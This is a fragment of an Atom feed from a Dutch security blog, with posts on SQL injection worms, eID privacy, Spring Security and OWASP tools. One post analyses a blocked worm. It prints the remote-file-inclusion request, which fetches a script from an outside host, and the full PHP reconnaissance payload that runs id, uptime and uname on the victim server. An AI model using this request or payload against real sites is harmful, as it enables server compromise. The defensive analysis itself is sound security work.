type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/256528796635471918'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/256528796635471918'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/04/interessant-document-ivm-core-jee.html' title='Interessant document ivm Core JEE patterns en security'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-513095375389442612</id><published>2008-06-25T06:14:00.000-07:00</published><updated>2008-06-25T06:16:32.455-07:00</updated><title type='text'>SQL Injection - Deel 4</title><content type='html'>Microsoft heeft drie tools gelanceerd om web site owners te helpen tegen het SQL Injection virus.&lt;br /&gt;&lt;br /&gt;Eerst tool is voor source code analysis, tweede tool is een crawler zoals het virus en een derde tool is een beta versie van URLScan dat SQL Injection afblokt.&lt;br /&gt;&lt;br /&gt;Ik zou zeggen: het wordt tijd om die te installeren en te gebruiken!&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-513095375389442612?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='enclosure' type='' href='http://blogs.technet.com/swi/archive/2008/06/24/new-tools-to-block-and-eradicate-sql-injection.aspx' length='0'/><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/513095375389442612/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=513095375389442612' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/513095375389442612'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/513095375389442612'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2008/06/sql-injection-deel-4.html' title='SQL Injection - Deel 4'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-3674986100600253177</id><published>2008-06-16T05:48:00.000-07:00</published><updated>2008-06-16T06:13:26.400-07:00</updated><title type='text'>eID en de privacy</title><content type='html'>Daarnet de video gezien over de "onveiligheid" van de eID vanop http://belsec.skynetblogs.be/post/5870586/belgian-eid--the-video-that-shows-how-good-ou&lt;br /&gt;OK, de privacywall is niet echt zoals het moet. Maar het probleem is wel groter dan wat de video beweert. Om de data uit te lezen moet de gebruiker een programma opstarten, dus dit via e-mail binnenkrijgen of downloaden. Dit wordt op een bedrijfsnetwerk toch al beter tegengehouden dan 5 jaar geleden.&lt;br /&gt;&lt;br /&gt;Ik herinner mij mijn presentatie op het seminarie van IT Works in 2005 over eID security waar ik duidelijk aangaf dat iedereen die op een web site kwam met daarin een hidden Java applet al zijn eID data kon worden uitgelezen (naam, adres, ...) omdat Internet Explorer en Firefox standaard de toelating geven. &lt;br /&gt;&lt;br /&gt;En dat is pas een goede versie van Google Analytics :)&lt;br /&gt;&lt;br /&gt;De enige pop-up die je krijgt in de browser is voor de PIN-code, wat ook kan worden gespoofed. Maar ja, van zodra je op de verkeerde website komt kunnen er veel ergere dingen gebeuren dan je familie naam en adres stelen. &lt;br /&gt;&lt;br /&gt;Dus zoals SOS Piet zou zeggen: Wat hebben we vandaag geleerd?&lt;br /&gt;1. Gebruik alleen de e-ID als de website HTTPS vereist en gebruikt (heel belangrijk want dit wordt veel vergetenà&lt;br /&gt;2. Geef de PIN-code alleen in op een website die je vertrouwt (opnieuw, enkel als stap 1 bestaat)&lt;br /&gt;3. Van zodra de authenticatie is gelukt verwijder de kaart uit de kaartlezer en laat die niet de ganse dag insteken&lt;br /&gt;&lt;br /&gt;Stap 3 is natuurlijk moeilijk als je heel veel de e-ID moet gebruiken, maar ik denk dat we mogen stellen dat 80% van de gebruikers die de e-ID al hebben dit maar een paar keer per maand nodig hebben.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-3674986100600253177?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/3674986100600253177/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=3674986100600253177' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/3674986100600253177'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/3674986100600253177'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2008/06/eid-en-de-privacy.html' title='eID en de privacy'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-4226169268461585729</id><published>2008-06-04T05:35:00.000-07:00</published><updated>2008-06-04T05:37:39.279-07:00</updated><title type='text'>SQL Injection virus - Deel 3</title><content type='html'>Zonet nog een ontdekking gedaan ivm het SQL Injection virus. Als de web site content importeert van geinfecteerde web sites dan is dit ook een manier om bezoekers te infecteren.&lt;br /&gt;&lt;br /&gt;HTML encoderen van output is dus een must om bezoekers niet te infecteren.&lt;br /&gt;Ook validatie van data imports is noodzakelijk.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-4226169268461585729?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/4226169268461585729/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=4226169268461585729' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/4226169268461585729'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/4226169268461585729'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2008/06/sql-injection-virus-deel-3.html' title='SQL Injection virus - Deel 3'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-842207876498556156</id><published>2008-06-04T04:33:00.000-07:00</published><updated>2008-06-04T04:39:37.817-07:00</updated><title type='text'>SQL Injection virus - Deel 2</title><content type='html'>Zojuist gezien dat er ook al web sites het virus bevatten die geschreven zijn in ASP.NET.&lt;br /&gt;Dit betekent dus dat er een variant is die zich richt op ASPX extensies in Google.&lt;br /&gt;&lt;br /&gt;Analyses en richtlijnen van Microsoft, &lt;a href="http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx"&gt;http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Het is dus nog niet gedaan. Zeker als je weet dat er meer .NET web sites zijn om te infecteren.&lt;br /&gt;&lt;br /&gt;Ondertussen detecteren de meeste anti-virus scanners het script, dus dat is een goeie zaak.&lt;br /&gt;Als je met een up-to-date anti-virus scanner werkt natuurlijk.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-842207876498556156?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/842207876498556156/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=842207876498556156' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/842207876498556156'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/842207876498556156'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2008/06/sql-injection-virus-deel-2.html' title='SQL Injection virus - Deel 2'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-2062452723356455889</id><published>2008-06-02T04:20:00.000-07:00</published><updated>2008-06-02T04:28:51.991-07:00</updated><title type='text'>PHP worm gedetecteerd</title><content type='html'>Volgens mij gaat er een nieuwe worm rond die PHP sites infecteert.&lt;br /&gt;Men maakt misbruik van een remote file inclusion bug in aide.php3. Dit is een Franstalig PHP pakket, GestArt.&lt;br /&gt;&lt;br /&gt;Volgende trigger blokkeerde de request in onze ModSecurity:&lt;br /&gt;GET /aide.php3?aide=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1&lt;br /&gt;TE: deflate,gzip;q=0.3&lt;br /&gt;Connection: TE, close&lt;br /&gt;Host: &lt;a href="http://www.e-noteca.be/"&gt;:)&lt;/a&gt;&lt;br /&gt;User-Agent: libwww-perl/5.76&lt;br /&gt;&lt;br /&gt;Die id2.txt is een PHP script dat doorgeeft hoeveel diskspace het systeem over heeft:&lt;br /&gt;&lt;?phpfunction ConvertBytes($number){       &lt;br /&gt;$len = strlen($number);       &lt;br /&gt;if($len &lt; 4)        {              &lt;br /&gt; return sprintf("%d b", $number);       &lt;br /&gt;}       &lt;br /&gt;if($len &gt;= 4 &amp;amp;&amp;amp; $len &lt;=6)        {               &lt;br /&gt;return sprintf("%0.2f Kb", $number/1024);       &lt;br /&gt;}       &lt;br /&gt;if($len &gt;= 7 &amp;amp;&amp;amp; $len &lt;=9)        {               &lt;br /&gt;return sprintf("%0.2f Mb", $number/1024/1024);       &lt;br /&gt;}          &lt;br /&gt;return sprintf("%0.2f Gb", $number/1024/1024/1024);                           }&lt;br /&gt;&lt;br /&gt;echo "netcat&lt;br /&gt;";&lt;br /&gt;$un = @php_uname();&lt;br /&gt;$up = system(uptime);&lt;br /&gt;$id1 = system(id);&lt;br /&gt;$pwd1 = @getcwd();&lt;br /&gt;$sof1 = getenv("SERVER_SOFTWARE");&lt;br /&gt;$php1 = phpversion();&lt;br /&gt;$name1 = $_SERVER['SERVER_NAME'];&lt;br /&gt;$ip1 = gethostbyname($SERVER_ADDR);&lt;br /&gt;$free1= diskfreespace($pwd1);&lt;br /&gt;$free = ConvertBytes(diskfreespace($pwd1));&lt;br /&gt;if (!$free) {$free = 0;}&lt;br /&gt;$all1= disk_total_space($pwd1);&lt;br /&gt;$all = ConvertBytes(disk_total_space($pwd1));&lt;br /&gt;if (!$all) {$all = 0;}&lt;br /&gt;$used = ConvertBytes($all1-$free1);&lt;br /&gt;$os = @PHP_OS;&lt;br /&gt;echo "netcat&lt;br /&gt;";&lt;br /&gt;echo "uname -a: $un&lt;br /&gt;";&lt;br /&gt;echo "os: $os&lt;br /&gt;";&lt;br /&gt;echo "uptime: $up&lt;br /&gt;";&lt;br /&gt;echo "id: $id1&lt;br /&gt;";&lt;br /&gt;echo "pwd: $pwd1&lt;br /&gt;";&lt;br /&gt;echo "php: $php1&lt;br /&gt;";&lt;br /&gt;echo "software: $sof1&lt;br /&gt;";&lt;br /&gt;echo "server-name: $name1&lt;br /&gt;";&lt;br /&gt;echo "server-ip: $ip1&lt;br /&gt;";&lt;br /&gt;echo "free: $free&lt;br /&gt;";&lt;br /&gt;echo "used: $used&lt;br /&gt;";&lt;br /&gt;echo "total: $all&lt;br /&gt;";&lt;br /&gt;exit;&lt;br /&gt;&lt;br /&gt;Iemand is dus op zoek naar gratis hosting!&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-2062452723356455889?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/2062452723356455889/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=2062452723356455889' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/2062452723356455889'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/2062452723356455889'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2008/06/php-worm-gedetecteerd.html' title='PHP worm gedetecteerd'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-7608014681513831164</id><published>2008-05-16T04:35:00.000-07:00</published><updated>2008-05-16T04:41:45.515-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL Injection'/><category scheme='http://www.blogger.com/atom/ns#' term='worm'/><title type='text'>Nieuwe SQL Injection worm - webmasters opgepast!</title><content type='html'>Als u nog een website gebruikt met Microsoft ASP en een achterliggende databank, lees dan zeker verder.&lt;br /&gt;Een nieuw virus is actief dat gebruik maakt van SQL Injection om zich te verspreiden en om web sites te infecteren met een virus. Bezoekers van dergelijke sites worden dan geïnfecteerd door kwaadaardig JavaScript.&lt;br /&gt;&lt;br /&gt;Onderzoek van oa SecureWorks blijkt dat de SQL Injection attack gebeurt door geïnfecteerde PCs. Deze bots gebruiken Google om web sites te vinden met extensie .asp. Als een web site is geïdentifeerd dan probeert de bot om via SQL Injection een gevaarlijke payload weg te schrijven in de databank. Als deze databank wordt gebruikt als Content Management Systeem (CMS) dan zal op een web pagina deze payload worden meegegeven aan de bezoeker. De payload probeert om via JavaScript kwetsbaarheden in de browser en plug-ins zoals RealPlayer uit te buiten en zo een virus te installeren.&lt;br /&gt;&lt;br /&gt;Ook Belgische web sites zijn geïnfecteerd. &lt;br /&gt;&lt;br /&gt;Hebt u een web site in ASP, zorg er dan voor dat u alle parameters valideert om SQL Injection tegen te houden.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-7608014681513831164?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/7608014681513831164/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=7608014681513831164' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/7608014681513831164'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/7608014681513831164'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2008/05/nieuwe-sql-injection-worm-webmasters.html' title='Nieuwe SQL Injection worm - webmasters opgepast!'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-5265792939177164904</id><published>2007-09-17T07:56:00.000-07:00</published><updated>2007-09-17T08:09:27.656-07:00</updated><title type='text'>Is Acegi een J2EE security framework?</title><content type='html'>Ik ben voor OWASP druk bezig met het OWASP Java Project waar ik probeer om de OWASP Top 10 2007 te herschrijven naar Java. Natuurlijk heb ik nu een paar bemerkingen die ik wil delen.&lt;br /&gt;&lt;br /&gt;Spring maakt gebruik van Acegi en dus noemt Acegi nu Spring Security. Veel informatie is er niet te vinden, maar Acegi is eigenlijk een authorisatie-filter die toegang geeft tot URLs of niet. Acegi kijkt dus of je een geauthenticeerde sessie hebt en of je de toelating hebt om een bepaalde URL te openen. Hmmmm.... De ervaring leert mij dat ontwikkelaars en beheerders niet de gewoonte hebben om 2 verschillende applicaties en URLs te gebruiken voor hetzelfde doel. Dit betekent dat meestal een gebruiker en een beheerder inloggen op dezelfde applicatie en site. Dus dan wordt het moeilijk om granulaire authorisatie regels te definiëren. Hiermee moet men dus van in het begin rekening houden.&lt;br /&gt;&lt;br /&gt;Maar wat ik mis in een dergelijk "security framework" is een rudimentaire beveiliging tegen typische aanvallen.&lt;br /&gt;Voor mij moet een security framework (J2EE, PHP of .NET of ...) tot volgende zaken bevatten:&lt;br /&gt;- authenticatie, liefst met sterke authenticatie&lt;br /&gt;- authorisatie, op URL en objectniveau en eenvoudig te configureren en niet programmeren&lt;br /&gt;- input validatie geïntegreerd met een deftige audit logging&lt;br /&gt;- output encoding&lt;br /&gt;- audit trail&lt;br /&gt;- positieve security&lt;br /&gt;- encapsulation van identiteit en propagation van identiteit&lt;br /&gt;&lt;br /&gt;Ik ben nog altijd op zoek naar een J2EE applicatie die 3 van bovenstaande punten bevat!&lt;br /&gt;&lt;br /&gt;Commentaar is meer dan welkom&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-5265792939177164904?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/5265792939177164904/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=5265792939177164904' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/5265792939177164904'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/5265792939177164904'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/09/is-acegi-een-j2ee-security-framework.html' title='Is Acegi een J2EE security framework?'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-8181915610013339127</id><published>2007-09-10T02:42:00.000-07:00</published><updated>2007-09-10T02:47:31.928-07:00</updated><title type='text'></title><content type='html'>De laatste maanden toch een paar interessante projecten uitgevoerd (idd, geen vakantie dit jaar), waarbij een paar zaken waarvan ik dacht dat die quasi niet meer mogelijk zijn toch nog alive-and-kicking zijn.&lt;br /&gt;&lt;br /&gt;Ten eerste: standaard gebruikersnamen en wachtwoorden. Ongelooflijk hoe eenvoudig je hiermee binnengeraakt op routers, FTP servers, ... en dan nog met admin rechten&lt;br /&gt;&lt;br /&gt;Ten tweede: te veel vertrouwen in de gebruiker/bezoeker van de applicatie. Een gebruiker die te veel kan en mag is een slechte zaak vanuit een security standpunt. Dus waarom zijn de applicaties dan ook zo niet geschreven? Omdat het niet op papier staat.... Dan komen we terug op abuse cases en dergelijke&lt;br /&gt;&lt;br /&gt;Ten derde: geen documentatie&lt;br /&gt;&lt;br /&gt;Ten vierde: geen reactie! Niemand die het heeft opgemerkt dat er een probleem is en een hacker (ik dus :)) toegang had&lt;br /&gt;&lt;br /&gt;Dus er is nog veel werk aan de winkel!&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-8181915610013339127?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/8181915610013339127/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=8181915610013339127' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/8181915610013339127'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/8181915610013339127'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/09/de-laatste-maanden-toch-een-paar.html' title=''/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-4354939354703999683</id><published>2007-09-10T02:36:00.000-07:00</published><updated>2007-09-10T02:42:03.135-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='webscarab'/><category scheme='http://www.blogger.com/atom/ns#' term='webgoat'/><category scheme='http://www.blogger.com/atom/ns#' term='owasp'/><title type='text'>OWASP WebGoat en WebScarab</title><content type='html'>Vorig week mocht ik op vraag van Seba een uur een sessie geven over WebGoat en WebScarab op de OWASP security dag. Er was een goede opkomst en een mix van programmeurs en security mensen.&lt;br /&gt;Wat me vooral is bijgebleven is dat je toch wel heel technisch moet zijn om zelf uit te zoeken hoe WebGoat en WebScarab werken. Ik denk dat veel te maken heeft met het gebrek aan documentatie en de niet-intuïtieve gebruikersinterface van de twee tools. Aangezien ik er al 5 jaar mee speel is het voor mij natuurlijk wel heel gemakkelijk om die te gebruiken.&lt;br /&gt;Het goede nieuws is dat als mensen wisten hoe alles te configureren is, ze toch wel goed kunnen volgen.&lt;br /&gt;Het nog betere nieuws is dat de OWASP WebGoat Solution Guide af is. Dus dit wil zeggen dat er binnenkort een knop "Solution" te vinden is in elke WebGoat les zodat mensen die willen bijleren over web security beter hun weg vinden.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-4354939354703999683?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/4354939354703999683/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=4354939354703999683' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/4354939354703999683'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/4354939354703999683'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/09/owasp-webgoat-en-webscarab.html' title='OWASP WebGoat en WebScarab'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-2885837070368394088</id><published>2007-06-08T07:41:00.000-07:00</published><updated>2007-06-08T07:47:00.661-07:00</updated><title type='text'>MSDN presentatie over Ajax &amp; security</title><content type='html'>Deze week had men mij gevraagd van Microsoft België om een presentatie te geven op een MSDN (Microsoft Developer Network) over ASP.NET AJAX en de security problemen.&lt;br /&gt;Dit is natuurlijk een interessante uitdaging. Er valt heel veel over te vertellen en er kan ook veel fout gaan.&lt;br /&gt;Maar het is natuurlijk niet evident om concepten als Javascript Hijacking en Cross-site-request-forgery uit te leggen als de mensen nog problemen hebben met zoiets als cross-site-scripting.&lt;br /&gt;Als ik een presentatie geef dan heb ik altijd de gewoonte om het publiek een paar vragen te stellen. Dus als ik vroeg "wie heeft al gehoord van cross-site-scripting" dan stak de volledige cinema-zaal zijn hand op, maar als ik dan vroeg "wie begrijpt het concept" dan zag ik met moeite een paar vingers. En het is begrijpelijk! Cross-site-scripting is moeilijk te vertalen in iets eenvoudigs en zeker niet als onderdeel van een presentatie van 2 uur. Maar het concept is nodig om de andere kwetsbaarheden te kunnen uitleggen.&lt;br /&gt;Voor mensen die geïnteresseerd zijn om meer te weten, ik geef een hands-on cursus "Improving your web applications security" eind juni. Meer informatie en inschrijven via deze PDF: &lt;a href="http://www.zionsecurity.com/uploads/media/Improving_your_web_applications_security.pdf"&gt;http://www.zionsecurity.com/uploads/media/Improving_your_web_applications_security.pdf&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-2885837070368394088?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/2885837070368394088/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=2885837070368394088' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/2885837070368394088'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/2885837070368394088'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2007/06/msdn-presentatie-over-ajax-security.html' title='MSDN presentatie over Ajax &amp; security'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-7395767679071226608</id><published>2007-05-11T06:48:00.000-07:00</published><updated>2007-05-11T06:55:57.251-07:00</updated><title type='text'>Digitale radio en bandbreedte</title><content type='html'>Vorige week een rare situatie meegemaakt. Mijn collega kreeg bij een klant een rapport van de ISP, waaruit bleek dat sinds een paar weken sommige dagen men een download van 3 tot 4 GB had, zelfs in het weekend. Natuurlijk zijn we als security mensen direct wantrouwig en er waren een paar mogelijke oorzaken:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;PC die een peer-to-peer programma had staan om zaken zoals MP3s en DVDs af te halen&lt;/li&gt;&lt;li&gt;PC die geïnfecteerd was met een virus&lt;/li&gt;&lt;li&gt;Iemand die op het netwerk geconnecteerd was (bijv. via wireless) die geen toelating had&lt;/li&gt;&lt;li&gt;...&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Hoe pak je dit nu aan? Gelukkig hadden we de firewall juist veranderd naar Check Point UTM-1. Voordeel van dergelijke firewall is de logging. En die hadden we dus voldoende. &lt;/p&gt;&lt;p&gt;Een uurtje logs bekijken gaf al heel snel de oplossing. Er waren geen rare poorten die werden gebruikt, buiten DNS, SMTP en HTTP verkeer. Maar op HTTP was er wel veel connecties van een bepaalde PC. En de URL was altijd dezelfde. Dus snel de URL opzoeken en dit bleek &lt;a href="http://www.digitaleradio.be"&gt;www.digitaleradio.be&lt;/a&gt; te zijn. Aha!&lt;/p&gt;&lt;p&gt;Dit is een streaming audio site, waar je dus gewoon naar digitale radio kunt luisteren. Maar wel aan een snelheid van 96 kilobyte per seconde. Dus dit betekent 96*60 = 5760 kilobyte per minuut of 5760*60= 345600 kilobyte per uur. Dus per uur een 345600/1024= 337,5 MB download. Dus een werkdag van 8 uur levert al snel een 3 tot 4 GB op. Voor 1 geconnecteerde PC!!! &lt;/p&gt;&lt;p&gt;En waarom dit in het weekend voorviel was snel uitgeklaard. Er werd in het weekend soms doorgewerkt. &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-7395767679071226608?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/7395767679071226608/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=7395767679071226608' title='0 Comments'/><link rel='edit' type='application/atom+xml' 